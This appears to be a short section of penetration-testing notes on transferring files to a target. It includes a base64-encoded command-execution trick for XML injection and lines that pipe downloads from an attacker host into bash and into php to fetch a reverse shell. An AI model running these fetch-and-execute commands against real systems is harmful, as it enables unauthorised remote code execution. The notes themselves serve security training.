Transferring Files

This section could easily be put in the post-exploitation section. But I consider this knowledge so fundamental that I chose to put it here.

Giant file transfer, can't transfer over network (Base64)

base64 file
highlight beginning, hit enter to copy to bottom, ctrl+c, paste
base64 -d pastedfile
md5sum both to ensure accurate completion

Can also be used for encoding/decoding issues and file execution

XML as example:

We could base64 encode the user supplied command (since base64 characters don't break XML) and decode that on the command line into a file, then execute that file with /bin/bash and then remove that temporary file all while avoiding special XML characters. For example, the following one-line command could achieve this:

echo L3Vzci9iaW4vd2hvYW1pIA==| base64 -d | tee -a /tmp/payload.tmp ; /bin/bash /tmp/payload.tmp; /bin/rm /tmp/ payload.tmp

Quick file transfer & execute scripts

on attack
python -m SimpleHTTPServer 8080

on target
curl KALIIP:8080/ | bash
LinEnum as example
Quick shell

on target
curl http://KALIIP/php-reverse-shell.php | php


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